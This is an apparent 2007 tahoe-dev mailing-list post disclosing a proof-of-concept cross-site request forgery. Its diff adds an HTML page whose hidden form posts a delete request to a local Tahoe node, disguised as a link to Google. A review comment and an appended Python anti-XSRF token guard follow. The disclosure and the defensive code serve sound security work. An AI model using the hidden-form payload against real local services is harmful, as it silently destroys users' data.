[tahoe-dev] Example XSRF attack.

Nathan nejucomo at gmail.com
Sun Aug 19 17:38:40 PDT 2007


Hi folks,

Since I've only recently learned about XSRF attacks, I have little
practical experience with them.  I suspected the current webapi was
vulnerable to such attacks, but wanted a proof-of-concept.  Here it
is.

One misconception I hope this points out is that Javascript security
constraints are certainly not adequate to rely on.

This example shows how subtle such attacks can be.  In the wild I
would easily miss having launched this attack, and I bet most
security-conscious surfers would also.  I'm not too familiar with HTML
and Javascript, but this attack took me about 20 minutes to write
(including Googling for examples).


Regards,
Nathan

ps: Darcs patch attached, and human readable diff follows:

Sun Aug 19 18:21:38 MDT 2007  nejucomo at gmail.com
  * This example XSRF attack deletes private data.

  It's an html page which describes its own operation.

diff -rN -u old-tahoe/docs/example-xsrf-attack.html
new-tahoe/docs/example-xsrf-attack.html
--- old-tahoe/docs/example-xsrf-attack.html	1969-12-31 17:00:00.000000000 -0700
+++ new-tahoe/docs/example-xsrf-attack.html	2007-08-19 18:29:40.000000000 -0600
@@ -0,0 +1,81 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+  <head>
+    <title>Example XSRF attach against Tahoe v0.5</title>
+  </head>
+
+  <body>
+    <h1>Example XSRF attach against Tahoe v0.5</h1>
+
+    <p>
+      <b>NOTE:</b> This page contains an attack triggered by a link
+      clearly labeled "ATTACK LINK".  Other links should be benign.
+    </p>
+
+    <p>
+      This serves as an example XSRF attack against Tahoe v0.5.  If the
+      requisite conditions are met, then clicking on an innocuous looking
+      link below will delete your private Tahoe contents.
+    </p>
+
+    <p>
+      This example illustrates how stealthy such attacks can be.
+      If successful, the user may easily believe they followed a simple
+      link to Google, when actually they deleted private Tahoe contents.
+    </p>
+
+    <h2>Requisite Conditions</h2>
+    <ol>
+      <li>
+        Your private vdrive has a file named "xsrf/targetdata".
+        (If this example succeeds this path will be deleted!)
+      </li>
+      <li>
+        Your Tahoe node is running with a web interface listening to
+        <a href="http://localhost:8080/">http://localhost:8080/</a>.
+      </li>
+      <li>
+        Your browser has Javascript enabled.
+      </li>
+    </ol>
+
+    <p>
+      Notice, this attack could come from any source (such as another
+      website, or html-enabled email) so long as the browser has Tahoe
+      access.
+    </p>
+
+    <h2>Attack Trigger</h2>
+
+    <p>
+      This paragraph contains a hidden html payload for the attack.
+      <div style="display:none;">
+      <form
+        method="post"
+        name="htmlAttackPayload"
+        action="http://localhost:8080/vdrive/private/xsrf">
+
+        <input type="hidden" name="t" value="delete">
+        <input type="hidden" name="name" value="targetdata">
+        <input type="hidden" name="when_done" value="http://www.google.com">
+      </form>
+      </div>
+    </p>
+
+    <p>
+      If the attack is successful, you should be redirected to www.google.com.
+    </p>
+
+    <p>
+      Click this <a
+      href="javascript:document.htmlAttackPayload.submit();">ATTACK
+      LINK</a> to launch the attack.
+    </p>
+
+    <hr>
+<!-- Created: Sun Aug 19 17:41:32 MDT 2007 -->
+<!-- hhmts start -->
+Last modified: Sun Aug 19 18:21:36 MDT 2007
+<!-- hhmts end -->
+  </body>
+</html>
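Review bot: the title and the h1 read "attach" where "attack" is meant (`<title>Example XSRF attach against Tahoe v0.5</title>` and the matching `<h1>`); spell both as "attack". Separately, the `<div style="display:none;">` that wraps the hidden form sits inside a `<p>`, which HTML 4.01 does not permit (a block-level div implicitly closes the open paragraph, leaving the later `</p>` stray); either make the wrapper a `<div>` or close the paragraph before the hidden div. Since this is a docs page whose purpose is to explain the weakness, it would also help readers to state the fix it motivates in a short closing section: the webapi should not accept a state-changing POST on the strength of the browser's ambient access to localhost:8080 alone, but should require a secret that only pages the node itself renders can supply, so that a form built on a third-party page is refused.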
-------------- next part --------------
A non-text attachment was scrubbed...
Name: xsrf-example.patch
Type: text/x-patch
Size: 38544 bytes
Desc: not available
Url : http://allmydata.org/pipermail/tahoe-dev/attachments/20070819/54aa30d1/attachment-0001.bin 
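A defensive counterpart to the forged POST in the message above, added here as an example and not part of Nathan's mail or of Tahoe's webapi: a form handler that refuses a state-changing request unless it carries a token that only pages served by the node itself can embed, with a Referer/Origin check as a second layer. The `CsrfGuard` class, the `xsrf_token` field, the `client_id` value and the request headers are assumed or constructed for illustration; the form fields (`t=delete`, `name=targetdata`, `when_done`) and the http://localhost:8080 origin are the ones from the example page.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Assumed: the origin the node's web interface listens on, taken from the
# example page's "Requisite Conditions".
NODE_ORIGIN = "http://localhost:8080"


class CsrfGuard:
    """Issues and verifies per-client anti-XSRF tokens (hypothetical helper).

    The token is an HMAC over a client identifier under a secret only the
    node knows.  Pages the node itself renders embed the token in their
    forms; a page served from another origin cannot read it, so a forged
    form submission arrives without a valid token.
    """

    def __init__(self, secret=None):
        self._secret = secret if secret is not None else secrets.token_bytes(32)

    def issue_token(self, client_id):
        return hmac.new(self._secret, client_id.encode("utf-8"),
                        hashlib.sha256).hexdigest()

    def token_ok(self, client_id, presented):
        if not presented:
            return False
        # Constant-time comparison so a wrong token leaks nothing about the right one.
        return hmac.compare_digest(self.issue_token(client_id), presented)


def origin_ok(headers, node_origin=NODE_ORIGIN):
    """Secondary check: the request must claim to come from the node's own origin.

    Browsers of the 2007 era sent Referer but not yet Origin, and either may
    be stripped by proxies or privacy settings, so this fails closed when both
    are absent and is used in addition to the token, never instead of it.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlparse(source)
    return f"{parts.scheme}://{parts.netloc}" == node_origin


def handle_vdrive_post(guard, client_id, form, headers):
    """Decide whether a POST such as t=delete may be executed.

    Returns (allowed, reason).  A real handler would perform the operation
    only when allowed is True and answer 403 otherwise.
    """
    if not origin_ok(headers):
        return False, "cross-site or missing Origin/Referer"
    if not guard.token_ok(client_id, form.get("xsrf_token")):
        return False, "missing or invalid anti-XSRF token"
    return True, "ok: %s %s" % (form.get("t"), form.get("name"))


def demo():
    """Replays the forged POST from the example page against the guarded handler."""
    guard = CsrfGuard()
    client = "browser-session-1"  # constructed client identifier
    # Constructed: the exact fields the hidden form on the example page submits.
    forged = {"t": "delete", "name": "targetdata",
              "when_done": "http://www.google.com"}
    # Constructed: headers a browser would attach when the form lives on a third-party page.
    forged_headers = {"Referer": "http://third-party.example/page.html"}
    # Constructed: the same operation issued from a page the node rendered itself.
    legit = dict(forged, xsrf_token=guard.issue_token(client))
    legit_headers = {"Referer": NODE_ORIGIN + "/vdrive/private/xsrf"}
    return {
        "forged": handle_vdrive_post(guard, client, forged, forged_headers),
        "same_origin_no_token": handle_vdrive_post(guard, client, forged, legit_headers),
        "legit": handle_vdrive_post(guard, client, legit, legit_headers),
    }


if __name__ == "__main__":
    for name, (allowed, reason) in demo().items():
        print(f"{name:22s} allowed={allowed} ({reason})")
```

The token is the primary control: it is the one thing a page on another origin cannot obtain, regardless of whether JavaScript is enabled in the victim's browser. The Referer/Origin comparison is cheap and catches the plain case, but because those headers are optional it is only worth having as a second layer that fails closed.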

